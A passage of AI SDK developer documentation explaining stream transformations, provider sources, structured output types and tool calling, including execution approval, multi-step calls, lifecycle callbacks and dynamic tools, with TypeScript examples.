When you invoke stopStream, it is important to simulate the finish-step and finish events to guarantee that a well-formed stream is returned
and all callbacks are invoked.
import { streamText, type TextStreamPart, type ToolSet } from 'ai';
const stopWordTransform =
<TOOLS extends ToolSet>() =>
({ stopStream }: { stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
// note: this is a simplified transformation for testing;
// a real-world version would need stream buffering and
// scanning to correctly emit prior text and to detect
// all STOP occurrences.
transform(chunk, controller) {
if (chunk.type !== 'text-delta') {
controller.enqueue(chunk);
return;
}
if (chunk.text.includes('STOP')) {
// stop the stream
stopStream();
// simulate the finish-step event
controller.enqueue({
type: 'finish-step',
finishReason: 'stop',
rawFinishReason: 'stop',
usage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
response: {
id: 'response-id',
modelId: 'mock-model-id',
timestamp: new Date(0),
},
providerMetadata: undefined,
});
// simulate the finish event
controller.enqueue({
type: 'finish',
finishReason: 'stop',
rawFinishReason: 'stop',
totalUsage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
});
return;
}
controller.enqueue(chunk);
},
});
Multiple transformations
You can also provide multiple transformations. They are applied in the order they are provided.
const result = streamText({
model,
prompt,
experimental_transform: [firstTransform, secondTransform],
});
Sources
Some providers such as Perplexity and Google Generative AI include sources in the response.
Currently sources are limited to web pages that ground the response.
You can access them using the sources property of the result.
Each url source contains the following properties:
- id: The ID of the source.
- url: The URL of the source.
- title: The optional title of the source.
- providerMetadata: Provider metadata for the source.
When you use generateText, you can access the sources using the sources property:
import { generateText } from 'ai';
import { google } from '@ai-sdk/google';
const result = await generateText({
model: 'google/gemini-2.5-flash',
tools: {
google_search: google.tools.googleSearch({}),
},
prompt: 'List the top 5 San Francisco news from the past week.',
});
for (const source of result.sources) {
if (source.sourceType === 'url') {
console.log('ID:', source.id);
console.log('Title:', source.title);
console.log('URL:', source.url);
console.log('Provider metadata:', source.providerMetadata);
console.log();
}
}
When you use streamText, you can access the sources using the fullStream property:
import { streamText } from 'ai';
import { google } from '@ai-sdk/google';
const result = streamText({
model: 'google/gemini-2.5-flash',
tools: {
google_search: google.tools.googleSearch({}),
},
prompt: 'List the top 5 San Francisco news from the past week.',
});
for await (const part of result.fullStream) {
if (part.type === 'source' && part.sourceType === 'url') {
console.log('ID:', part.id);
console.log('Title:', part.title);
console.log('URL:', part.url);
console.log('Provider metadata:', part.providerMetadata);
console.log();
}
}
The sources are also available in the result.sources promise.
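For example, you can await the promise on the streamText result from above once the stream has been consumed:
// resolves once the stream has finished:
const sources = await result.sources;
console.log('Number of sources:', sources.length);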
Examples
You can see generateText and streamText in action using various frameworks in the following examples:
generateText
<ExampleLinks examples={[ { title: 'Learn to generate text in Node.js', link: '/examples/node/generating-text/generate-text', }, { title: 'Learn to generate text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-text', }, { title: 'Learn to generate text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-text', }, ]} />
streamText
<ExampleLinks examples={[ { title: 'Learn to stream text in Node.js', link: '/examples/node/generating-text/stream-text', }, { title: 'Learn to stream text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-text-generation', }, { title: 'Learn to stream text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-text-generation', }, ]} />
title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.
Generating Structured Data
While text generation can be useful, your use case will likely call for generating structured data. For example, you might want to extract information from text, classify data, or generate synthetic data.
Many language models are capable of generating structured data, often exposed through provider features such as "JSON mode" or "tool calling". However, you need to manually provide schemas and then validate the generated data, as LLMs can produce incorrect or incomplete structured data.
The AI SDK standardizes structured object generation across model providers
using the output property on generateText
and streamText.
You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want,
and the AI model will generate data that conforms to that structure.
Generating Structured Outputs
Use generateText with Output.object() to generate structured data from a prompt.
The schema is also used to validate the generated data, ensuring type safety and correctness.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateText, Output } from 'ai';
const result = await generateText({
// ...
output: Output.object({ schema }),
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
Stream Structured Outputs
Given the added complexity of returning structured data, model response time can be unacceptable for your interactive use case.
With streamText and output, you can stream the model's structured response as it is generated.
import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { partialOutputStream } = streamText({
model: __MODEL__,
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
// use partialOutputStream as an async iterable
for await (const partialObject of partialOutputStream) {
console.log(partialObject);
}
You can consume the structured output on the client with the useObject hook.
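As a rough client-side sketch, assuming a React component, that useObject is available from @ai-sdk/react (exported as experimental_useObject), and a hypothetical /api/recipe route that streams the structured output:
'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';

// assumption: the same recipe schema as on the server, kept in a shared module
const recipeSchema = z.object({
  recipe: z.object({
    name: z.string(),
    ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
    steps: z.array(z.string()),
  }),
});

export default function Page() {
  const { object, submit, isLoading } = useObject({
    api: '/api/recipe', // hypothetical route
    schema: recipeSchema,
  });

  return (
    <div>
      <button onClick={() => submit('Generate a lasagna recipe.')} disabled={isLoading}>
        Generate
      </button>
      <pre>{JSON.stringify(object, null, 2)}</pre>
    </div>
  );
}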
Error Handling in Streams
streamText starts streaming immediately. When errors occur during streaming, they become part of the stream rather than thrown exceptions (to prevent stream crashes).
To handle errors, provide an onError callback:
import { streamText, Output } from 'ai';
const result = streamText({
// ...
output: Output.object({ schema }),
onError({ error }) {
console.error(error); // log to your error tracking service
},
});
For non-streaming error handling with generateText, see the Error Handling section below.
Output Types
The AI SDK supports multiple ways of specifying the expected structure of generated data via the Output object. You can select from various strategies for structured/text generation and validation.
Output.text()
Use Output.text() to generate plain text from a model. This option doesn't enforce any schema on the result: you simply receive the model's text as a string. This is the default behavior when no output is specified.
import { generateText, Output } from 'ai';
const { output } = await generateText({
// ...
output: Output.text(),
prompt: 'Tell me a joke.',
});
// output will be a string (the joke)
Output.object()
Use Output.object({ schema }) to generate a structured object based on a schema (for example, a Zod schema). The output is type-validated to ensure the returned result matches the schema.
import { generateText, Output } from 'ai';
import { z } from 'zod';
const { output } = await generateText({
// ...
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number().nullable(),
labels: z.array(z.string()),
}),
}),
prompt: 'Generate information for a test user.',
});
// output will be an object matching the schema above
Output.array()
Use Output.array({ element }) to specify that you expect an array of typed objects from the model, where each element should conform to a schema (defined in the element property).
import { generateText, Output } from 'ai';
import { z } from 'zod';
const { output } = await generateText({
// ...
output: Output.array({
element: z.object({
location: z.string(),
temperature: z.number(),
condition: z.string(),
}),
}),
prompt: 'List the weather for San Francisco and Paris.',
});
// output will be an array of objects like:
// [
// { location: 'San Francisco', temperature: 70, condition: 'Sunny' },
// { location: 'Paris', temperature: 65, condition: 'Cloudy' },
// ]
When streaming arrays with streamText, you can use elementStream to receive each completed element as it is generated:
import { streamText, Output } from 'ai';
import { z } from 'zod';
const { elementStream } = streamText({
// ...
output: Output.array({
element: z.object({
name: z.string(),
class: z.string(),
description: z.string(),
}),
}),
prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});
for await (const hero of elementStream) {
console.log(hero); // Each hero is complete and validated
}
Output.choice()
Use Output.choice({ options }) when you expect the model to choose from a specific set of string options, such as for classification or fixed-enum answers.
import { generateText, Output } from 'ai';
const { output } = await generateText({
// ...
output: Output.choice({
options: ['sunny', 'rainy', 'snowy'],
}),
prompt: 'Is the weather sunny, rainy, or snowy today?',
});
// output will be one of: 'sunny', 'rainy', or 'snowy'
You can provide any set of string options, and the output will always be a single string value that matches one of the specified options. The AI SDK validates that the result matches one of your options, and will throw if the model returns something invalid.
This is especially useful for making classification-style generations or forcing valid values for API compatibility.
Output.json()
Use Output.json() when you want to generate and parse unstructured JSON values from the model, without enforcing a specific schema. This is useful if you want to capture arbitrary objects, flexible structures, or when you want to rely on the model's natural output rather than rigid validation.
import { generateText, Output } from 'ai';
const { output } = await generateText({
// ...
output: Output.json(),
prompt:
'For each city, return the current temperature and weather condition as a JSON object.',
});
// output could be any valid JSON, for example:
// {
// "San Francisco": { "temperature": 70, "condition": "Sunny" },
// "Paris": { "temperature": 65, "condition": "Cloudy" }
// }
With Output.json, the AI SDK only checks that the response is valid JSON; it doesn't validate the structure or types of the values. If you need schema validation, use the .object or .array outputs instead.
For more advanced validation or different structures, see the Output API reference.
Generating Structured Outputs with Tools
One of the key advantages of using structured output with generateText and streamText is the ability to combine it with tool calling.
import { generateText, Output, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather for a location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }) => {
// fetch weather data
return { temperature: 72, condition: 'sunny' };
},
}),
},
output: Output.object({
schema: z.object({
summary: z.string(),
recommendation: z.string(),
}),
}),
stopWhen: stepCountIs(5),
prompt: 'What should I wear in San Francisco today?',
});
Property Descriptions
You can add .describe("...") to individual schema properties to give the model hints about what each property is for. This helps improve the quality and accuracy of generated structured data:
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
name: z.string().describe('The name of the recipe'),
ingredients: z
.array(
z.object({
name: z.string(),
amount: z
.string()
.describe('The amount of the ingredient (grams or ml)'),
}),
)
.describe('List of ingredients with amounts'),
steps: z.array(z.string()).describe('Step-by-step cooking instructions'),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Property descriptions are particularly useful for:
- Clarifying ambiguous property names
- Specifying expected formats or conventions
- Providing context for complex nested structures
Output Name and Description
You can optionally specify a name and description for the output. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
output: Output.object({
name: 'Recipe',
description: 'A recipe for a dish.',
schema: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This works with all output types that support structured generation:
- Output.object({ name, description, schema })
- Output.array({ name, description, element })
- Output.choice({ name, description, options })
- Output.json({ name, description })
Accessing Reasoning
You can access the reasoning used by the language model to generate the object via the reasoningText property on the result. This property contains a string with the model's thought process, if available.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = await generateText({
model: __MODEL__, // must be a reasoning model
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
console.log(result.reasoningText);
Error Handling
When generateText with structured output cannot generate a valid object, it throws an AI_NoObjectGeneratedError.
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
The error preserves the following information to help you log the issue:
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
- response: Metadata about the language model response, including response id, timestamp, and model.
- usage: Request token usage.
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.
import { generateText, Output, NoObjectGeneratedError } from 'ai';
try {
await generateText({
model,
output: Output.object({ schema }),
prompt,
});
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
}
}
More Examples
You can see structured output generation in action using various frameworks in the following examples:
generateText with Output
<ExampleLinks examples={[ { title: 'Learn to generate structured data in Node.js', link: '/examples/node/generating-structured-data/generate-object', }, { title: 'Learn to generate structured data in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-object', }, { title: 'Learn to generate structured data in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-object', }, ]} />
streamText with Output
<ExampleLinks examples={[ { title: 'Learn to stream structured data in Node.js', link: '/examples/node/streaming-structured-data/stream-object', }, { title: 'Learn to stream structured data in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-object-generation', }, { title: 'Learn to stream structured data in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-object-generation', }, ]} />
title: Tool Calling description: Learn about tool calling and multi-step calls (using stopWhen) with AI SDK Core.
Tool Calling
As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain several core elements:
- description: An optional description of the tool that can influence when the tool is picked.
- inputSchema: A Zod schema or a JSON schema that defines the input parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
- execute: An optional async function that is called with the inputs from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.
- strict: (optional, boolean) Enables strict tool calling when supported by the provider.
The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5),
prompt: 'What is the weather in San Francisco?',
});
Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).
Strict Mode
When enabled, language model providers that support strict tool calling will only generate tool calls that are valid according to your defined inputSchema.
This increases the reliability of tool calling.
However, not all schemas may be supported in strict mode, and what is supported depends on the specific provider.
By default, strict mode is disabled. You can enable it per-tool by setting strict: true:
tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string(),
}),
strict: true, // Enable strict validation for this tool
execute: async ({ location }) => ({
// ...
}),
});
Input Examples
You can specify example inputs for your tools to help guide the model on how input data should be structured. When supported by providers, input examples can help when the JSON schema itself does not fully specify the intended usage or when there are optional values.
tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
inputExamples: [
{ input: { location: 'San Francisco' } },
{ input: { location: 'London' } },
],
execute: async ({ location }) => {
// ...
},
});
Tool Execution Approval
By default, tools with an execute function run automatically as the model calls them. You can require approval before execution by setting needsApproval:
import { tool } from 'ai';
import { z } from 'zod';
const runCommand = tool({
description: 'Run a shell command',
inputSchema: z.object({
command: z.string().describe('The shell command to execute'),
}),
needsApproval: true,
execute: async ({ command }) => {
// your command execution logic here
},
});
This is useful for tools that perform sensitive operations like executing commands, processing payments, modifying data, or other potentially dangerous actions.
How It Works
When a tool requires approval, generateText and streamText don't pause execution. Instead, they complete and return tool-approval-request parts in the result content. This means the approval flow requires two calls to the model: the first returns the approval request, and the second (after receiving the approval response) either executes the tool or informs the model that approval was denied.
Here's the complete flow:
- Call generateText with a tool that has needsApproval: true
- Model generates a tool call
- generateText returns with tool-approval-request parts in result.content
- Your app requests an approval and collects the user's decision
- Add a tool-approval-response to the messages array
- Call generateText again with the updated messages
- If approved, the tool runs and returns a result. If denied, the model sees the denial and responds accordingly.
Handling Approval Requests
After calling generateText or streamText, check result.content for tool-approval-request parts:
import { type ModelMessage, generateText } from 'ai';
const messages: ModelMessage[] = [
{ role: 'user', content: 'Remove the most recent file' },
];
const result = await generateText({
model: __MODEL__,
tools: { runCommand },
messages,
});
messages.push(...result.response.messages);
for (const part of result.content) {
if (part.type === 'tool-approval-request') {
console.log(part.approvalId); // Unique ID for this approval request
console.log(part.toolCall); // Contains toolName, input, etc.
}
}
To respond, create a tool-approval-response and add it to your messages:
import { type ToolApprovalResponse } from 'ai';
const approvals: ToolApprovalResponse[] = [];
for (const part of result.content) {
if (part.type === 'tool-approval-request') {
const response: ToolApprovalResponse = {
type: 'tool-approval-response',
approvalId: part.approvalId,
approved: true, // or false to deny
reason: 'User confirmed the command', // Optional context for the model
};
approvals.push(response);
}
}
// add approvals to messages
messages.push({ role: 'tool', content: approvals });
Then call generateText again with the updated messages. If approved, the tool executes. If denied, the model receives the denial and can respond accordingly.
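A minimal sketch of that second call, reusing the messages array and the runCommand tool from above:
const followUp = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  messages, // now contains the tool-approval-response
});

// if approved, the tool has executed; if denied, the model acknowledges the denial
console.log(followUp.text);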
Dynamic Approval
You can make approval decisions based on tool input by providing an async function:
const paymentTool = tool({
description: 'Process a payment',
inputSchema: z.object({
amount: z.number(),
recipient: z.string(),
}),
needsApproval: async ({ amount }) => amount > 1000,
execute: async ({ amount, recipient }) => {
return await processPayment(amount, recipient);
},
});
In this example, only transactions over $1000 require approval. Smaller transactions execute automatically.
Tool Execution Approval with useChat
When using useChat, the approval flow is handled through UI state. See Chatbot Tool Usage for details on handling approvals in your UI with addToolApprovalResponse.
Multi-Step Calls (using stopWhen)
With the stopWhen setting, you can enable multi-step calls in generateText and streamText. When stopWhen is set and the model generates a tool call, the AI SDK will trigger a new generation passing in the tool result until there are no further tool calls or the stopping condition is met.
The AI SDK provides several built-in stopping conditions:
- stepCountIs(count): stops after a specified number of steps (default: stepCountIs(20))
- hasToolCall(toolName): stops when a specific tool is called
- isLoopFinished(): never triggers, letting the loop run until naturally finished
You can also combine multiple conditions in an array or create custom conditions. See Loop Control for more details.
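For example, you can pass an array of conditions; the loop stops as soon as any of them matches (the finalAnswer tool name here is hypothetical):
import { generateText, stepCountIs, hasToolCall } from 'ai';

const result = await generateText({
  // ...
  stopWhen: [
    stepCountIs(10), // stop after at most 10 steps
    hasToolCall('finalAnswer'), // or as soon as the finalAnswer tool is called
  ],
});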
By default, when you use generateText or streamText, it triggers a single generation. This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response, or generate a tool call. If the model generates a tool call, its generation is complete and that step is finished.
You may want the model to generate text after the tool has been executed, e.g. to summarize the tool results in the context of the user's query. In many cases, you may also want the model to use multiple tools in a single response. This is where multi-step calls come in.
You can think of multi-step calls in a similar way to a conversation with a human. When you ask a question, if the person does not have the requisite knowledge at hand (a model's training data), they may need to look up information (use a tool) before they can provide you with an answer. In the same way, the model may need to call a tool to get the information it needs to answer your question, where each generation (tool call or text generation) is a step.
Example
In the following example, there are two steps:
- Step 1
  - The prompt 'What is the weather in San Francisco?' is sent to the model.
  - The model generates a tool call.
  - The tool call is executed.
- Step 2
  - The tool result is sent to the model.
  - The model generates a response considering the tool result.
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const { text, steps } = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // stop after a maximum of 5 steps if tools were called
prompt: 'What is the weather in San Francisco?',
});
You can use streamText in a similar way.
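A sketch of the streaming variant, assuming the weather tool from the example above has been extracted as weatherTool:
import { streamText, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  tools: { weather: weatherTool },
  stopWhen: stepCountIs(5),
  prompt: 'What is the weather in San Francisco?',
});

// the text from all steps is combined into a single stream:
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}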
Steps
To access intermediate tool calls and results, you can use the steps property in the result object
or the streamText onFinish callback.
It contains all the text, tool calls, tool results, and more from each step.
Example: Extract tool results from all steps
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { steps } = await generateText({
model: __MODEL__,
stopWhen: stepCountIs(10),
// ...
});
// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);
onStepFinish callback
When using generateText or streamText, you can provide an onStepFinish callback that
is triggered when a step is finished,
i.e. all text deltas, tool calls, and tool results for the step are available.
When you have multiple steps, the callback is triggered for each step.
The callback receives a stepNumber (zero-based) to identify which step just completed:
import { generateText } from 'ai';
const result = await generateText({
// ...
onStepFinish({
stepNumber,
text,
toolCalls,
toolResults,
finishReason,
usage,
}) {
console.log(`Step ${stepNumber} finished (${finishReason})`);
// your own logic, e.g. for saving the chat history or recording usage
},
});
Tool execution lifecycle callbacks
You can use experimental_onToolCallStart and experimental_onToolCallFinish to observe tool execution.
These callbacks are called right before and after each tool's execute function, giving you
visibility into tool execution timing, inputs, outputs, and errors:
import { generateText } from 'ai';
const result = await generateText({
// ... model, tools, prompt
experimental_onToolCallStart({ toolName, toolCallId, input }) {
console.log(`Calling tool: ${toolName}`, { toolCallId, input });
},
experimental_onToolCallFinish({
toolName,
toolCallId,
output,
error,
durationMs,
}) {
if (error) {
console.error(`Tool ${toolName} failed after ${durationMs}ms:`, error);
} else {
console.log(`Tool ${toolName} completed in ${durationMs}ms`, { output });
}
},
});
Errors thrown inside these callbacks are silently caught and do not break the generation flow.
prepareStep callback
The prepareStep callback is called before a step is started.
It is called with the following parameters:
- model: The model that was passed into generateText.
- stopWhen: The stopping condition that was passed into generateText.
- stepNumber: The number of the step that is being executed.
- steps: The steps that have been executed so far.
- messages: The messages that will be sent to the model for the current step.
- experimental_context: The context passed via the experimental_context setting (experimental).
You can use it to provide different settings for a step, including modifying the input messages.
import { generateText } from 'ai';
const result = await generateText({
// ...
prepareStep: async ({ model, stepNumber, steps, messages }) => {
if (stepNumber === 0) {
return {
// use a different model for this step:
model: modelForThisParticularStep,
// force a tool choice for this step:
toolChoice: { type: 'tool', toolName: 'tool1' },
// limit the tools that are available for this step:
activeTools: ['tool1'],
};
}
// when nothing is returned, the default settings are used
},
});
Message Modification for Longer Agentic Loops
In longer agentic loops, you can use the messages parameter to modify the input messages for each step. This is particularly useful for prompt compression:
prepareStep: async ({ stepNumber, steps, messages }) => {
// Compress conversation history for longer loops
if (messages.length > 20) {
return {
messages: messages.slice(-10),
};
}
return {};
},
Provider Options for Step Configuration
You can use providerOptions in prepareStep to pass provider-specific configuration for each step. This is useful for features like Anthropic's code execution container persistence:
import { forwardAnthropicContainerIdFromLastStep } from '@ai-sdk/anthropic';
// Propagate container ID from previous step for code execution continuity
prepareStep: forwardAnthropicContainerIdFromLastStep,
Response Messages
Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.
Both generateText and streamText have a response.messages property that you can use to
add the assistant and tool messages to your conversation history.
It is also available in the onFinish callback of streamText.
The response.messages property contains an array of ModelMessage objects that you can add to your conversation history:
import { generateText, ModelMessage } from 'ai';
const messages: ModelMessage[] = [
// ...
];
const { response } = await generateText({
// ...
messages,
});
// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)
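With streamText, you can do the same in the onFinish callback (a sketch):
import { streamText, ModelMessage } from 'ai';

const messages: ModelMessage[] = [
  // ...
];

const result = streamText({
  // ...
  messages,
  onFinish({ response }) {
    // add the assistant and tool messages from all steps:
    messages.push(...response.messages);
  },
});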
Dynamic Tools
AI SDK Core supports dynamic tools for scenarios where tool schemas are not known at compile time. This is useful for:
- MCP (Model Context Protocol) tools without schemas
- User-defined functions at runtime
- Tools loaded from external sources
Using dynamicTool
The dynamicTool helper creates tools with unknown input/output types:
import { dynamicTool } from 'ai';
import { z } from 'zod';
const customTool = dynamicTool({
description: 'Execute a custom function',
inputSchema: z.object({}),
execute: async input => {
// input is typed as 'unknown'
// You need to validate/cast it at runtime
const { action, parameters } = input as any;
// Execute your dynamic logic
return { result: `Executed ${action}` };
},
});
Type-Safe Handling
When using both static and dynamic tools, use the dynamic flag for type narrowing:
const result = await generateText({
model: __MODEL__,
tools: {
// Static tool with known types
weather: weatherTool,
// Dynamic tool
custom: dynamicTool({
/* ... */
}),
},
onStepFinish: ({ toolCalls, toolResults }) => {
// Type-safe iteration
for (const toolCall of toolCalls) {
if (toolCall.dynamic) {
// Dynamic tool: input is 'unknown'
console.log('Dynamic:', toolCall.toolName, toolCall.input);
continue;
}
// Static tool: full type inference
switch (toolCall.toolName) {
case 'weather':
console.log(toolCall.input.location); // typed as string
break;
}
}
},
});
Preliminary Tool Results
You can return an AsyncIterable over multiple results.
In this case, the last value from the iterable is the final tool result.
This can be used in combination with generator functions to e.g. stream status information during the tool execution:
tool({
description: 'Get the current weather.',
inputSchema: z.object({
location: z.string(),
}),
async *execute({ location }) {
yield {
status: 'loading' as const,
text: `Getting weather for ${location}`,
weather: undefined,
};
await new Promise(resolve => setTimeout(resolve, 3000));
const temperature = 72 + Math.floor(Math.random() * 21) - 10;
yield {
status: 'success' as const,
text: `The weather in ${location} is ${temperature}°F`,
temperature,
};
},
});
Tool Choice
You can use the toolChoice setting to influence when a tool is selected.
It supports the following settings:
- auto (default): the model can choose whether and which tools to call.
- required: the model must call a tool. It can choose which tool to call.
- none: the model must not call tools.
- { type: 'tool', toolName: string (typed) }: the model must call the specified tool.
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
toolChoice: 'required', // force the model to call a tool
prompt: 'What is the weather in San Francisco?',
});
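To force a specific tool instead, pass a typed tool choice object:
const result = await generateText({
  // ... same model and tools as above
  toolChoice: { type: 'tool', toolName: 'weather' }, // must call the weather tool
  prompt: 'What is the weather in San Francisco?',
});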
Tool Execution Options
When tools are called, they receive additional options as a second parameter.
Tool Call ID
The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.
import {
streamText,
tool,
createUIMessageStream,
createUIMessageStreamResponse,
} from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const stream = createUIMessageStream({
execute: ({ writer }) => {
const result = streamText({
// ...
messages,
tools: {
myTool: tool({
// ...
execute: async (args, { toolCallId }) => {
// return e.g. custom status for tool call
writer.write({
type: 'data-tool-status',
id: toolCallId,
data: {
name: 'myTool',
status: 'in-progress',
},
});
// ...
},
}),
},
});
writer.merge(result.toUIMessageStream());
},
});
return createUIMessageStreamResponse({ stream });
}
Messages
The messages that were sent to the language model to initiate the response that contained the tool call are forwarded to the tool execution.
You can access them in the second parameter of the execute function.
In multi-step calls, the messages contain the text, tool calls, and tool results from all previous steps.
import { generateText, tool } from 'ai';
const result = await generateText({
// ...
tools: {
myTool: tool({
// ...
execute: async (args, { messages }) => {
// use the message history in e.g. calls to other language models
return { ... };
},
}),
},
});
Abort Signals
The abort signals from generateText and streamText are forwarded to the tool execution.
You can access them in the second parameter of the execute function and e.g. abort long-running computations or forward them to fetch calls inside tools.
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
abortSignal: myAbortSignal, // signal that will be forwarded to tools
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }, { abortSignal }) => {
return fetch(
`https://api.weatherapi.com/v1/current.json?q=${location}`,
{ signal: abortSignal }, // forward the abort signal to fetch
);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Context (experimental)
You can pass in arbitrary context from generateText or streamText via the experimental_context setting.
This context is available in the experimental_context tool execution option.
const result = await generateText({
// ...
tools: {
someTool: tool({
// ...
execute: async (input, { experimental_context: context }) => {
const typedContext = context as { example: string }; // or use type validation library
// ...
},
}),
},
experimental_context: { example: '123' },
});
Tool Input Lifecycle Hooks
The following tool input lifecycle hooks are available:
- onInputStart: Called when the model starts generating the input (arguments) for the tool call
- onInputDelta: Called for each chunk of text as the input is streamed
- onInputAvailable: Called when the complete input is available and validated
onInputStart and onInputDelta are only called in streaming contexts (when using streamText). They are not called when using generateText.
Example
import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = streamText({
model: __MODEL__,
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
onInputStart: () => {
console.log('Tool call starting');
},
onInputDelta: ({ inputTextDelta }) => {
console.log('Received input chunk:', inputTextDelta);
},
onInputAvailable: ({ input }) => {
console.log('Complete input:', input);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Types
Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.
You can use them to strongly type your variables, function parameters, and return types
in parts of the code that are not directly related to streamText or generateText.
Each tool call is typed with ToolCall<NAME extends string, ARGS>, depending
on the tool that has been invoked.
Similarly, the tool results are typed with ToolResult<NAME extends string, ARGS, RESULT>.
The tools in streamText and generateText are defined as a ToolSet.
